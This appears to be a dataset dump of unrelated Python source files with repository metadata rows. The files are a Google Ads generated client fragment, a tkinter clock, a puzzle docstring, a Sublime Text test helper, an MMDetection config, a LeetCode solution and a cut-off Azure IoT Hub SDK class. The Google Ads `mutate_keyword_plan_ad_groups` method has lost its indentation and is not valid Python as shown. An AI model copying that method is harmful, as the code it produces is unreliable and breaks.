                cert, key = client_options.client_cert_source()
                ssl_credentials = grpc.ssl_channel_credentials(
                    certificate_chain=cert, private_key=key
                )
                is_mtls = True
            else:
                # Fall back to the default client certificate, if any.
                creds = SslCredentials()
                is_mtls = creds.is_mtls
                ssl_credentials = creds.ssl_credentials if is_mtls else None

        # Figure out which api endpoint to use.
        # Explicit client_options.api_endpoint wins over the env-var logic.
        if client_options.api_endpoint is not None:
            api_endpoint = client_options.api_endpoint
        else:
            use_mtls_env = os.getenv("GOOGLE_API_USE_MTLS_ENDPOINT", "auto")
            if use_mtls_env == "never":
                api_endpoint = self.DEFAULT_ENDPOINT
            elif use_mtls_env == "always":
                api_endpoint = self.DEFAULT_MTLS_ENDPOINT
            elif use_mtls_env == "auto":
                api_endpoint = self.DEFAULT_MTLS_ENDPOINT if is_mtls else self.DEFAULT_ENDPOINT
            else:
                raise MutualTLSChannelError(
                    "Unsupported GOOGLE_API_USE_MTLS_ENDPOINT value. Accepted values: never, auto, always"
                )

        # Save or instantiate the transport.
        # Ordinarily, we provide the transport, but allowing a custom transport
        # instance provides an extensibility point for unusual situations.
        if isinstance(transport, KeywordPlanAdGroupServiceTransport):
            # transport is a KeywordPlanAdGroupServiceTransport instance.
            if credentials:
                raise ValueError('When providing a transport instance, '
                                 'provide its credentials directly.')
            self._transport = transport
        elif isinstance(transport, str):
            # transport given by label ('grpc'); built with the default endpoint.
            Transport = type(self).get_transport_class(transport)
            self._transport = Transport(
                credentials=credentials, host=self.DEFAULT_ENDPOINT
            )
        else:
            self._transport = KeywordPlanAdGroupServiceGrpcTransport(
                credentials=credentials,
                host=api_endpoint,
                ssl_channel_credentials=ssl_credentials,
                client_info=client_info,
            )
    def get_keyword_plan_ad_group(self,
            request: keyword_plan_ad_group_service.GetKeywordPlanAdGroupRequest = None,
            *,
            resource_name: str = None,
            retry: retries.Retry = gapic_v1.method.DEFAULT,
            timeout: float = None,
            metadata: Sequence[Tuple[str, str]] = (),
            ) -> keyword_plan_ad_group.KeywordPlanAdGroup:
        r"""Returns the requested Keyword Plan ad group in full
        detail.

        Args:
            request (:class:`google.ads.googleads.v5.services.types.GetKeywordPlanAdGroupRequest`):
                The request object. Request message for
                [KeywordPlanAdGroupService.GetKeywordPlanAdGroup][google.ads.googleads.v5.services.KeywordPlanAdGroupService.GetKeywordPlanAdGroup].
            resource_name (:class:`str`):
                Required. The resource name of the
                Keyword Plan ad group to fetch.

                This corresponds to the ``resource_name`` field
                on the ``request`` instance; if ``request`` is provided, this
                should not be set.
            retry (google.api_core.retry.Retry): Designation of what errors, if any,
                should be retried.
            timeout (float): The timeout for this request.
            metadata (Sequence[Tuple[str, str]]): Strings which should be
                sent along with the request as metadata.

        Returns:
            google.ads.googleads.v5.resources.types.KeywordPlanAdGroup:
                A Keyword Planner ad group.
                Max number of keyword plan ad groups per
                plan: 200.

        Raises:
            ValueError: If both ``request`` and ``resource_name`` are set.
        """
        # Create or coerce a protobuf request object.
        # Sanity check: If we got a request object, we should *not* have
        # gotten any keyword arguments that map to the request.
        if request is not None and any([resource_name]):
            raise ValueError('If the `request` argument is set, then none of '
                             'the individual field arguments should be set.')

        # Minor optimization to avoid making a copy if the user passes
        # in a keyword_plan_ad_group_service.GetKeywordPlanAdGroupRequest.
        # There's no risk of modifying the input as we've already verified
        # there are no flattened fields.
        if not isinstance(request, keyword_plan_ad_group_service.GetKeywordPlanAdGroupRequest):
            request = keyword_plan_ad_group_service.GetKeywordPlanAdGroupRequest(request)

        # If we have keyword arguments corresponding to fields on the
        # request, apply these.
        if resource_name is not None:
            request.resource_name = resource_name

        # Wrap the RPC method; this adds retry and timeout information,
        # and friendly error handling.
        rpc = self._transport._wrapped_methods[self._transport.get_keyword_plan_ad_group]

        # Certain fields should be provided within the metadata header;
        # add these here (routing header keyed on the resource name).
        metadata = tuple(metadata) + (
            gapic_v1.routing_header.to_grpc_metadata((
                ('resource_name', request.resource_name),
            )),
        )

        # Send the request.
        response = rpc(
            request,
            retry=retry,
            timeout=timeout,
            metadata=metadata,
        )

        # Done; return the response.
        return response
def mutate_keyword_plan_ad_groups(self,
request: keyword_plan_ad_group_service.MutateKeywordPlanAdGroupsRequest = None,
*,
customer_id: str = None,
operations: Sequence[keyword_plan_ad_group_service.KeywordPlanAdGroupOperation] = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> keyword_plan_ad_group_service.MutateKeywordPlanAdGroupsResponse:
r"""Creates, updates, or removes Keyword Plan ad groups.
Operation statuses are returned.
Args:
request (:class:`google.ads.googleads.v5.services.types.MutateKeywordPlanAdGroupsRequest`):
The request object. Request message for
[KeywordPlanAdGroupService.MutateKeywordPlanAdGroups][google.ads.googleads.v5.services.KeywordPlanAdGroupService.MutateKeywordPlanAdGroups].
customer_id (:class:`str`):
Required. The ID of the customer
whose Keyword Plan ad groups are being
modified.
This corresponds to the ``customer_id`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
operations (:class:`Sequence[google.ads.googleads.v5.services.types.KeywordPlanAdGroupOperation]`):
Required. The list of operations to
perform on individual Keyword Plan ad
groups.
This corresponds to the ``operations`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.ads.googleads.v5.services.types.MutateKeywordPlanAdGroupsResponse:
Response message for a Keyword Plan
ad group mutate.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
if request is not None and any([customer_id, operations]):
raise ValueError('If the `request` argument is set, then none of '
'the individual field arguments should be set.')
# Minor optimization to avoid making a copy if the user passes
# in a keyword_plan_ad_group_service.MutateKeywordPlanAdGroupsRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, keyword_plan_ad_group_service.MutateKeywordPlanAdGroupsRequest):
request = keyword_plan_ad_group_service.MutateKeywordPlanAdGroupsRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if customer_id is not None:
request.customer_id = customer_id
if operations is not None:
request.operations = operations
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.mutate_keyword_plan_ad_groups]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((
('customer_id', request.customer_id),
)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
__all__ = (
'KeywordPlanAdGroupServiceClient',
)
| [
"bazel-bot-development[bot]@users.noreply.github.com"
] | bazel-bot-development[bot]@users.noreply.github.com |
9facb01edf8123187c2216673316c6136a0b5655 | 7a31235b60706896351c7e2fe8dbc47217023ddf | /Progress/digital_clock.py | 53e4089d6aa1583c0493b46a886ac67bd3351408 | [] | no_license | sailendrachettri/learning-tkinter | b947e9423654c63bc7b96eb58c03b8f8e0ba99e9 | e978eaa428b71168a16e2ba66c0c54089738a47e | refs/heads/main | 2023-05-27T14:32:06.419250 | 2021-06-11T08:53:27 | 2021-06-11T08:53:27 | 375,646,752 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,012 | py | import time
import time  # stdlib clock source; kept here so the script is self-contained
from tkinter import *
from PIL import Image
from PIL.ImageTk import PhotoImage

root = Tk()
root.title('Digital Clock - Sailendra')
root.geometry("600x650")
root.configure(bg="#0075A2")


def clock():
    """Refresh the clock label with the current local time, then reschedule."""
    hour = time.strftime("%I")
    minute = time.strftime("%M")
    second = time.strftime("%S")
    # "%p" is the portable strftime directive; the original "%P" is a
    # glibc-only extension that yields an empty string on Windows/macOS.
    # Lower-casing preserves the original lowercase "am"/"pm" rendering.
    am_pm = time.strftime("%p").lower()
    clock_label.config(text=hour + ":" + minute + ":" + second + " " + am_pm)
    # Re-invoke clock() after 1000 ms so the display keeps ticking.
    clock_label.after(1000, clock)


# Background image, resized to fit the window.
# Image.LANCZOS replaces Image.ANTIALIAS, which was removed in Pillow 10
# (both names refer to the same resampling filter).
image = Image.open("img/digital_clock.png")
resized = image.resize((500, 500), Image.LANCZOS)
new_image = PhotoImage(resized)
image_label = Label(root, image=new_image, bg="#0075A2")
image_label.grid(row=0, column=0, pady=40, padx=(40, 0))

# Label that displays the time text, drawn over the image cell.
clock_label = Label(root, text="10:20:20 Am", font="Helvetica 46 bold", bg='white', fg='red')
clock_label.grid(row=0, column=0, padx=(40, 0))

# Start the update loop and enter the Tk event loop.
clock()
root.mainloop()
| [
"sailendra9083@gmail.com"
] | sailendra9083@gmail.com |
19ea764231c1a94b224080d6bd26c7496422741d | 6b78bd7f62f7f407bf11d877cc4d91e7db3b62fe | /python/diamond_mine.py | 4669941ed0ebfebb735a8125bc0f2eb0f15142c5 | [] | no_license | PascalUlor/code-challenges | b85efacd4bc5999a0748d1fa1e84f503be09dc94 | 6488d0a6d2729bd50b106573f16488479fd6e264 | refs/heads/master | 2023-03-03T17:50:18.413127 | 2023-02-21T13:10:02 | 2023-02-21T13:10:02 | 212,979,719 | 1 | 0 | null | 2023-02-15T22:59:13 | 2019-10-05T10:14:29 | Python | UTF-8 | Python | false | false | 430 | py | """
1) Given an n*n matrix. Each cell contains 0, 1, or -1.
0 denotes there is no diamond at that location, but the path is open.
1 denotes there is a diamond at that location, and the path is open.
-1 denotes that the path is blocked.
Starting from (0, 0), you must reach the last cell and then return to (0, 0), collecting the maximum number of diamonds.
While going to the last cell you can move only right and down.
While returning you can move only left and up.
"""
| [
"pascalulor@yahoo.com"
] | pascalulor@yahoo.com |
4dff494aab4fd14ae50a55d20d20b9b04525c132 | d79a614759a818cffad595e1ad376e244b4550ed | /tests/unittest.py | db854e957be2c8ab2a8305e0b975fde48cde6063 | [
"BSD-3-Clause"
] | permissive | absszero/sublime-phpunit | 9577fc8c8b3b836a08847acf112038d0f5c59314 | 37f43378c3dae37cc88fa1910eea07da1ab4af9e | refs/heads/master | 2023-06-29T15:09:30.865548 | 2020-05-05T22:53:33 | 2020-05-05T22:53:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,260 | py | import os
from unittest import TestCase
from unittest import mock # noqa: F401
from unittest import skipIf # noqa: F401
from sublime import find_resources
from sublime import active_window
def fixtures_path(path=None):
    """Return the test fixtures directory, or *path* joined onto it."""
    base = os.path.join(os.path.dirname(__file__), 'fixtures')
    return base if path is None else os.path.join(base, path)
class ViewTestCase(TestCase):
    """TestCase providing a scratch Sublime Text view with PHP syntax.

    setUp creates an unlisted output panel with deterministic whitespace
    and indentation settings; tearDown closes it again.
    """

    def setUp(self):
        # An unlisted output panel never appears in the window's panel list.
        self.view = active_window().create_output_panel(
            'phpunit_test_view',
            unlisted=True
        )
        self.view.set_scratch(True)  # scratch views never prompt to save
        settings = self.view.settings()
        settings.set('auto_indent', False)
        settings.set('indent_to_bracket', False)
        # The original set 'tab_size' three times with the same value;
        # setting it once is equivalent.
        settings.set('tab_size', 4)
        settings.set('trim_automatic_white_space', False)
        settings.set('smart_indent', True)
        settings.set('translate_tabs_to_spaces', True)
        self.view.set_syntax_file(find_resources('PHP.sublime-syntax')[0])

    def tearDown(self):
        if self.view:
            self.view.close()

    def fixture(self, text):
        # Load the given fixture text into the view via the plugin command.
        self.view.run_command('phpunit_test_setup_fixture', {'text': text})
| [
"gerardroche@users.noreply.github.com"
] | gerardroche@users.noreply.github.com |
03188c1d306bc98d4c39a009acf8fc9d5177dad4 | ae12996324ff89489ded4c10163f7ff9919d080b | /LeetCodePython/SortTheStudentsByTheirKthScore.py | bd33fbc541d444dd7ce25c2e25b134d93734dc7f | [] | no_license | DeanHe/Practice | 31f1f2522f3e7a35dc57f6c1ae74487ad044e2df | 3230cda09ad345f71bb1537cb66124ec051de3a5 | refs/heads/master | 2023-07-05T20:31:33.033409 | 2023-07-01T18:02:32 | 2023-07-01T18:02:32 | 149,399,927 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,653 | py | """
There is a class with m students and n exams. You are given a 0-indexed m x n integer matrix score, where each row represents one student and score[i][j] denotes the score the ith student got in the jth exam. The matrix score contains distinct integers only.
You are also given an integer k. Sort the students (i.e., the rows of the matrix) by their scores in the kth (0-indexed) exam from the highest to the lowest.
Return the matrix after sorting it.
Example 1:
Input: score = [[10,6,9,1],[7,5,11,2],[4,8,3,15]], k = 2
Output: [[7,5,11,2],[10,6,9,1],[4,8,3,15]]
Explanation: In the above diagram, S denotes the student, while E denotes the exam.
- The student with index 1 scored 11 in exam 2, which is the highest score, so they got first place.
- The student with index 0 scored 9 in exam 2, which is the second highest score, so they got second place.
- The student with index 2 scored 3 in exam 2, which is the lowest score, so they got third place.
Example 2:
Input: score = [[3,4],[5,6]], k = 0
Output: [[5,6],[3,4]]
Explanation: In the above diagram, S denotes the student, while E denotes the exam.
- The student with index 1 scored 5 in exam 0, which is the highest score, so they got first place.
- The student with index 0 scored 3 in exam 0, which is the lowest score, so they got second place.
Constraints:
m == score.length
n == score[i].length
1 <= m, n <= 250
1 <= score[i][j] <= 10^5
score consists of distinct integers.
"""
from typing import List
class SortTheStudentsByTheirKthScore:
    def sortTheStudents(self, score: List[List[int]], k: int) -> List[List[int]]:
        """Return the student rows ordered by their k-th exam score, highest first."""
        def kth_score(student: List[int]) -> int:
            # Sort key: this student's score in exam k.
            return student[k]

        return sorted(score, key=kth_score, reverse=True)
"tengda.he@gmail.com"
] | tengda.he@gmail.com |
aafb5f0e2b2913ca35de9883987f2df7decb0f56 | 278d7f4467a112416d1adfbcd3218033ff0fd9b3 | /configs/cascade_rpn/crpn_faster_rcnn_r50_caffe_fpn_1x_coco.py | 12fdc8c8a7be3f7a59a9424662c683ff88982a17 | [] | no_license | Young-1217/detection | e3d67938b454e955b5b7a82d5ae222e62f9545fb | 6760288dac92e00ddc3e813ed0e1363c1fa1ce2d | refs/heads/main | 2023-06-01T21:41:37.998947 | 2021-06-21T10:03:01 | 2021-06-21T10:03:01 | 371,868,683 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,533 | py | _base_ = '../faster_rcnn/faster_rcnn_r50_caffe_fpn_1x_coco.py'
# MMDetection config: Faster R-CNN (R-50-caffe + FPN, 1x COCO schedule, via
# _base_) with its standard RPN replaced by a two-stage Cascade RPN head.
# Multiplier applied to the RPN cls/bbox loss weights below, balancing the
# RPN losses against the RoI head losses.
rpn_weight = 0.7
model = dict(
    rpn_head=dict(
        _delete_=True,  # discard the base config's rpn_head entirely
        type='CascadeRPNHead',
        num_stages=2,
        stages=[
            # Stage 1: regression-only (with_cls=False), single square anchor
            # per location, dilated adaptive convolution.
            dict(
                type='StageCascadeRPNHead',
                in_channels=256,
                feat_channels=256,
                anchor_generator=dict(
                    type='AnchorGenerator',
                    scales=[8],
                    ratios=[1.0],
                    strides=[4, 8, 16, 32, 64]),
                adapt_cfg=dict(type='dilation', dilation=3),
                bridged_feature=True,
                sampling=False,
                with_cls=False,
                reg_decoded_bbox=True,
                bbox_coder=dict(
                    type='DeltaXYWHBBoxCoder',
                    target_means=(.0, .0, .0, .0),
                    target_stds=(0.1, 0.1, 0.5, 0.5)),
                loss_bbox=dict(
                    type='IoULoss', linear=True,
                    loss_weight=10.0 * rpn_weight)),
            # Stage 2: adds classification (with_cls=True), offset-based
            # feature adaption, tighter regression std.
            dict(
                type='StageCascadeRPNHead',
                in_channels=256,
                feat_channels=256,
                adapt_cfg=dict(type='offset'),
                bridged_feature=False,
                sampling=True,
                with_cls=True,
                reg_decoded_bbox=True,
                bbox_coder=dict(
                    type='DeltaXYWHBBoxCoder',
                    target_means=(.0, .0, .0, .0),
                    target_stds=(0.05, 0.05, 0.1, 0.1)),
                loss_cls=dict(
                    type='CrossEntropyLoss',
                    use_sigmoid=True,
                    loss_weight=1.0 * rpn_weight),
                loss_bbox=dict(
                    type='IoULoss', linear=True,
                    loss_weight=10.0 * rpn_weight))
        ]),
    roi_head=dict(
        bbox_head=dict(
            bbox_coder=dict(target_stds=[0.04, 0.04, 0.08, 0.08]),
            loss_cls=dict(
                type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.5),
            loss_bbox=dict(type='SmoothL1Loss', beta=1.0, loss_weight=1.0))),
    # model training and testing settings
    train_cfg=dict(
        # One assigner/sampler config per Cascade RPN stage.
        rpn=[
            dict(
                assigner=dict(
                    type='RegionAssigner', center_ratio=0.2, ignore_ratio=0.5),
                allowed_border=-1,
                pos_weight=-1,
                debug=False),
            dict(
                assigner=dict(
                    type='MaxIoUAssigner',
                    pos_iou_thr=0.7,
                    neg_iou_thr=0.7,
                    min_pos_iou=0.3,
                    ignore_iof_thr=-1),
                sampler=dict(
                    type='RandomSampler',
                    num=256,
                    pos_fraction=0.5,
                    neg_pos_ub=-1,
                    add_gt_as_proposals=False),
                allowed_border=-1,
                pos_weight=-1,
                debug=False)
        ],
        rpn_proposal=dict(max_num=300, nms_thr=0.8),
        rcnn=dict(
            assigner=dict(
                pos_iou_thr=0.65, neg_iou_thr=0.65, min_pos_iou=0.65),
            sampler=dict(type='RandomSampler', num=256))),
    test_cfg=dict(
        rpn=dict(max_num=300, nms_thr=0.8), rcnn=dict(score_thr=1e-3)))
# Replace the base optimizer_config wholesale and enable gradient clipping.
optimizer_config = dict(
    _delete_=True, grad_clip=dict(max_norm=35, norm_type=2))
| [
"noreply@github.com"
] | Young-1217.noreply@github.com |
be828be8e6b3ef5b3d0469a50a97f4c57b295f59 | aba00d6272765b71397cd3eba105fc79b3a346e0 | /Old_Python_projects/ITGK/øving10/sudoku.py | 11337b49d12f25436ebcbada686bb6db904a94e1 | [] | no_license | JosteinGj/School | a2c7cc090571b867637003fe6c647898ba9d8d24 | 3b5f29846e443b97f042241237dbda3208b20831 | refs/heads/master | 2023-05-02T11:07:29.517669 | 2021-04-26T09:04:57 | 2021-04-26T09:04:57 | 295,340,194 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 210 | py | def make_board(filename):
file=open(filename)
board=file.readlines()
output=[]
for i in board:
row=i.split(",")
output.append(row)
return output
print(make_board("test.txt")) | [
"jostein.gj@gmail.com"
] | jostein.gj@gmail.com |
b59095cc433c622fc7c3b98d5c0af88910171240 | d7016f69993570a1c55974582cda899ff70907ec | /sdk/iothub/azure-mgmt-iothub/azure/mgmt/iothub/v2022_04_30_preview/aio/operations/_private_endpoint_connections_operations.py | 886ffd50f96903141ddcc4d811e963bfeec394e0 | [
"MIT",
"LicenseRef-scancode-generic-cla",
"LGPL-2.1-or-later"
] | permissive | kurtzeborn/azure-sdk-for-python | 51ca636ad26ca51bc0c9e6865332781787e6f882 | b23e71b289c71f179b9cf9b8c75b1922833a542a | refs/heads/main | 2023-03-21T14:19:50.299852 | 2023-02-15T13:30:47 | 2023-02-15T13:30:47 | 157,927,277 | 0 | 0 | MIT | 2022-07-19T08:05:23 | 2018-11-16T22:15:30 | Python | UTF-8 | Python | false | false | 28,250 | py | # pylint: disable=too-many-lines
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import sys
from typing import Any, Callable, Dict, IO, List, Optional, TypeVar, Union, cast, overload
from azure.core.exceptions import (
ClientAuthenticationError,
HttpResponseError,
ResourceExistsError,
ResourceNotFoundError,
ResourceNotModifiedError,
map_error,
)
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator_async import distributed_trace_async
from azure.core.utils import case_insensitive_dict
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
from ..._vendor import _convert_request
from ...operations._private_endpoint_connections_operations import (
build_delete_request,
build_get_request,
build_list_request,
build_update_request,
)
if sys.version_info >= (3, 8):
from typing import Literal # pylint: disable=no-name-in-module, ungrouped-imports
else:
from typing_extensions import Literal # type: ignore # pylint: disable=ungrouped-imports
T = TypeVar("T")
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class PrivateEndpointConnectionsOperations:
"""
.. warning::
**DO NOT** instantiate this class directly.
Instead, you should access the following operations through
:class:`~azure.mgmt.iothub.v2022_04_30_preview.aio.IotHubClient`'s
:attr:`private_endpoint_connections` attribute.
"""
models = _models
    def __init__(self, *args, **kwargs) -> None:
        # Collaborators are injected by the generated service client, either
        # positionally (in this fixed order) or by keyword: pipeline client,
        # client configuration, serializer, deserializer.
        input_args = list(args)
        self._client = input_args.pop(0) if input_args else kwargs.pop("client")
        self._config = input_args.pop(0) if input_args else kwargs.pop("config")
        self._serialize = input_args.pop(0) if input_args else kwargs.pop("serializer")
        self._deserialize = input_args.pop(0) if input_args else kwargs.pop("deserializer")
    @distributed_trace_async
    async def list(
        self, resource_group_name: str, resource_name: str, **kwargs: Any
    ) -> List[_models.PrivateEndpointConnection]:
        """List private endpoint connections.
        List private endpoint connection properties.
        :param resource_group_name: The name of the resource group that contains the IoT hub. Required.
        :type resource_group_name: str
        :param resource_name: The name of the IoT hub. Required.
        :type resource_name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: list of PrivateEndpointConnection or the result of cls(response)
        :rtype: list[~azure.mgmt.iothub.v2022_04_30_preview.models.PrivateEndpointConnection]
        :raises ~azure.core.exceptions.HttpResponseError:
        """
        # Map HTTP status codes to azure-core exception types; callers may
        # extend or override the mapping via an "error_map" keyword argument.
        error_map = {
            401: ClientAuthenticationError,
            404: ResourceNotFoundError,
            409: ResourceExistsError,
            304: ResourceNotModifiedError,
        }
        error_map.update(kwargs.pop("error_map", {}) or {})
        _headers = kwargs.pop("headers", {}) or {}
        _params = case_insensitive_dict(kwargs.pop("params", {}) or {})
        # Fixed api-version for this client; an explicit value passed by the
        # caller (kwargs or params) takes precedence.
        api_version: Literal["2022-04-30-preview"] = kwargs.pop(
            "api_version", _params.pop("api-version", "2022-04-30-preview")
        )
        cls: ClsType[List[_models.PrivateEndpointConnection]] = kwargs.pop("cls", None)
        # Build the GET request from the operation's URL template and inputs.
        request = build_list_request(
            resource_group_name=resource_group_name,
            resource_name=resource_name,
            subscription_id=self._config.subscription_id,
            api_version=api_version,
            template_url=self.list.metadata["url"],
            headers=_headers,
            params=_params,
        )
        request = _convert_request(request)
        request.url = self._client.format_url(request.url)
        # Send the request through the client pipeline (policies + transport).
        pipeline_response: PipelineResponse = await self._client._pipeline.run(  # pylint: disable=protected-access
            request, stream=False, **kwargs
        )
        response = pipeline_response.http_response
        # Any status other than 200 is surfaced as an HttpResponseError
        # carrying the service's ErrorDetails payload (when deserializable).
        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            error = self._deserialize.failsafe_deserialize(_models.ErrorDetails, pipeline_response)
            raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
        # Deserialize the payload into a list of PrivateEndpointConnection models.
        deserialized = self._deserialize("[PrivateEndpointConnection]", pipeline_response)
        if cls:
            # A caller-supplied "cls" callback also receives the raw response.
            return cls(pipeline_response, deserialized, {})
        return deserialized
    list.metadata = {
        "url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/iotHubs/{resourceName}/privateEndpointConnections"
    }
@distributed_trace_async
async def get(
self, resource_group_name: str, resource_name: str, private_endpoint_connection_name: str, **kwargs: Any
) -> _models.PrivateEndpointConnection:
"""Get private endpoint connection.
Get private endpoint connection properties.
:param resource_group_name: The name of the resource group that contains the IoT hub. Required.
:type resource_group_name: str
:param resource_name: The name of the IoT hub. Required.
:type resource_name: str
:param private_endpoint_connection_name: The name of the private endpoint connection. Required.
:type private_endpoint_connection_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: PrivateEndpointConnection or the result of cls(response)
:rtype: ~azure.mgmt.iothub.v2022_04_30_preview.models.PrivateEndpointConnection
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-04-30-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2022-04-30-preview")
)
cls: ClsType[_models.PrivateEndpointConnection] = kwargs.pop("cls", None)
request = build_get_request(
resource_group_name=resource_group_name,
resource_name=resource_name,
private_endpoint_connection_name=private_endpoint_connection_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.get.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorDetails, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize("PrivateEndpointConnection", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/iotHubs/{resourceName}/privateEndpointConnections/{privateEndpointConnectionName}"
}
async def _update_initial(
self,
resource_group_name: str,
resource_name: str,
private_endpoint_connection_name: str,
private_endpoint_connection: Union[_models.PrivateEndpointConnection, IO],
**kwargs: Any
) -> _models.PrivateEndpointConnection:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-04-30-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2022-04-30-preview")
)
content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
cls: ClsType[_models.PrivateEndpointConnection] = kwargs.pop("cls", None)
content_type = content_type or "application/json"
_json = None
_content = None
if isinstance(private_endpoint_connection, (IO, bytes)):
_content = private_endpoint_connection
else:
_json = self._serialize.body(private_endpoint_connection, "PrivateEndpointConnection")
request = build_update_request(
resource_group_name=resource_group_name,
resource_name=resource_name,
private_endpoint_connection_name=private_endpoint_connection_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
content_type=content_type,
json=_json,
content=_content,
template_url=self._update_initial.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorDetails, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
response_headers = {}
if response.status_code == 200:
deserialized = self._deserialize("PrivateEndpointConnection", pipeline_response)
if response.status_code == 201:
response_headers["Azure-AsyncOperation"] = self._deserialize(
"str", response.headers.get("Azure-AsyncOperation")
)
deserialized = self._deserialize("PrivateEndpointConnection", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, response_headers) # type: ignore
return deserialized # type: ignore
_update_initial.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/iotHubs/{resourceName}/privateEndpointConnections/{privateEndpointConnectionName}"
}
@overload
async def begin_update(
self,
resource_group_name: str,
resource_name: str,
private_endpoint_connection_name: str,
private_endpoint_connection: _models.PrivateEndpointConnection,
*,
content_type: str = "application/json",
**kwargs: Any
) -> AsyncLROPoller[_models.PrivateEndpointConnection]:
"""Update private endpoint connection.
Update the status of a private endpoint connection with the specified name.
:param resource_group_name: The name of the resource group that contains the IoT hub. Required.
:type resource_group_name: str
:param resource_name: The name of the IoT hub. Required.
:type resource_name: str
:param private_endpoint_connection_name: The name of the private endpoint connection. Required.
:type private_endpoint_connection_name: str
:param private_endpoint_connection: The private endpoint connection with updated properties.
Required.
:type private_endpoint_connection:
~azure.mgmt.iothub.v2022_04_30_preview.models.PrivateEndpointConnection
:keyword content_type: Body Parameter content-type. Content type parameter for JSON body.
Default value is "application/json".
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either PrivateEndpointConnection or the
result of cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.iothub.v2022_04_30_preview.models.PrivateEndpointConnection]
:raises ~azure.core.exceptions.HttpResponseError:
"""
@overload
async def begin_update(
self,
resource_group_name: str,
resource_name: str,
private_endpoint_connection_name: str,
private_endpoint_connection: IO,
*,
content_type: str = "application/json",
**kwargs: Any
) -> AsyncLROPoller[_models.PrivateEndpointConnection]:
